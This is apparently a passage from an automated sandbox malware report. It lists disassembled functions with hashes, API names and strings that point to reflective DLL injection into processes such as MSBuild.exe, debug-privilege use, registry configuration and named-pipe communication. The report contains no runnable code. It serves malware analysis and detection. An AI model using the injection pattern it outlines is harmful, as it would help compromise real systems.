                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: bfb0f3dcbc16dd7e905169d3e668c372deae167db14c11ac0dde80689d6e8db8
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: DA51D0721017908AEB788F2995843D977A0F358B95F184296FF8987BDDCB3AC8D1D700
                                                                                Function 000001160C9EA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 38e0666f760a89d6c4dff4200f4d00a5fc398ccb1c012e732d9cc72801301411
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 6C51A032100380CAEB788F2595443DC7BA1F769B94F189256FB9987BE9EF3AD590D700
                                                                                Function 000001160C9E8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 623309dcb81bcb3fa5951954a284173504c6b4767a28aa04621f8f1873a64e7e
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: CC5198326117008AEB28CB59E444BD937A9F368B98F5185A4FB16437CCFF36D881CB08
                                                                                Function 000001160C9E83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: b181be0b8d49ca97ed7d0a6d3859fa4ab53a0d211e4af4790d495e7bba5ae1b9
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 35316632211740DAE718DB5AE844BD977A8F368B98F568494BF5A0778CEF3AC941C708
                                                                                Function 000001160CA22058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 8d24d1c379ff5b064a00ca85a71021c8e834ae956c23c3106a98b4ba8d6802d4
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: C3D1F172714B9089E719CFAAD4503DC3BB1F3587A8F008256EF5A97B9DDA36C886C340
                                                                                Function 000001160CA114A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: a3043cd912496fb9cf00b2b0c11219ccbd7e8c2f02d13331619f4e360109a67b
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: CD012532602FA0C6E708DB6BA9142CAA7A0F78CF81F084425FF4A43729DE39D8918740
                                                                                Function 000001160CA22980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: 37e265badc22bf542196fdd943f68fcf59ce937976325ab88c9d13ff92c57310
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: C691B37270076485F7689F6E94603ED2BA0B75CBA8F144289FF0A57A9DDB36C8C2C700
                                                                                Function 000001160CA17960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: b3e2e8b3ee01e900106f8fb1ff11970b5bded7ad225184f936041eabba14970d
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 4F111836711F018AEB008B65E8643E833A4F71D758F441E21FF6D867A8DB79D5988380
                                                                                Function 000001160CA1253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: 882358c39291f2af5a493082e9d1eab477af66771de1d0ea3171835649493e7c
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: EF71B436200B8186EB2DDF2EA8543EA6794F38DB84F550266FF0953B9DDE36C685C700
                                                                                Function 000001160C9E9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: eb3fe4af68b8d01bc1b6c7a3ad90ad3afe4d69aaa56d732ad9d0e1b070ac0d9f
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: FF617A33A00B84CAEB28DF65D4803DD7BA0F768B88F054655EF4917B99EB3AD595C700
                                                                                Function 000001160CA12330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 0dd3096737f7cf84e0afb6c78436224c8bd63104462fa8f98e8db59649f6874d
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: EC51C47220478185E77C9E2EA4983EA6B91F38D790F450265FF5A03B9DDA3FC984C740
                                                                                Function 000001160CA226F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 7ec0ab3bc4456a239118220442b5b89ef32dd75cdd716ed4bea875251d6f3c28
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: AD41A272619B9086DB248F2AE8543E9A7A0F79C794F404121FF4D87798DB3DC881C740
                                                                                Function 000001160CA194A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: 55f76451f0a00aa76711e93bf972c8125f1d92d3f77d6b161e8a3b47fd2d8d2e
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 2C112B36615B8082EB658F29E45439A77E5F78CB94F584260EF8C07758DF3DC995CB00
                                                                                Function 000001160C9E7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 3f64ac4d0f423de6435d930bc6e48a03b4d3f4bc5a50e10074d9c9cf33aa7e29
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 70E08671640B4494DF098F62E8402D833A0EB6CB64F899122AA5C06355FA38D1EAC300
                                                                                Function 000001160C9E73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 3d9f1cadf2d574a733be8525cb7cdf29bcd32cd4cbcf8627c331bc1aac329539
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 68E08671640B4484DF098F61D8401D87360E76CB54BC99122EA4C06355FA38D1E5C300
                                                                                Function 000001160CA11BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 1fee924ccb90c0c3256cfe4e1177e9c659f148ef3ba26ee114369a7c0e31a1e3
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 60114F35602F9481EB58DB6BA4142E977A1FB8DFD0F184168EF4D5776ADE3AD882C300
                                                                                Function 000001160CA11268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: df6e12ff08372931fb7b06907e266d9e84ad481713e3d1ea27beb58647def250
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 70E03935602B1486EB088B67D82838A36E1EB8DB06F0480249F0907355DF7E98D9CB50

                                                                                Callgraph

                                                                                Executed Functions

                                                                                Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                • API String ID: 4177739653-1130149537
                                                                                • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                                • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                                Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                • API String ID: 2561231171-3753927220
                                                                                • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                                • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                                Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                • String ID:
                                                                                • API String ID: 4084875642-0
                                                                                • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                                • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                                Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                • String ID: .text$C:\Windows\System32\
                                                                                • API String ID: 2721474350-832442975
                                                                                • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                                • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                                Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2203880229-3489460547
                                                                                • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                                • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                                • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                                • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                                Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
